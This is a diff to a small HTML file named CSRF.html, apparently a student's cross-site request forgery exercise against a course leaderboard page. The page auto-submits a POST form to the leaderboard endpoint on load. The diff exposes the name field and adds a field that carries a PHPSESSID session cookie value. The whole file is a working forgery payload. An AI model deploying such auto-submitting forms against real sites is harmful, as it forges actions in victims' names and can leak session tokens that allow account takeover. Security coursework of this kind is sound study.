--- a/CSRF.html
+++ b/CSRF.html
@@ -1,7 +1,8 @@
 <html>
     <body>
         <form action="https://message.uqcloud.net/leaderboard.php" method="POST">
-            <input type="hidden" name="name" value="s4696637" />
+            <input name="name" value="s4696637" />
+            <input name="cookie" value="PHPSESSID=e8868d88a817844b88316deba46825ef" />
         </form>
         <script>
             document.forms[0].submit();
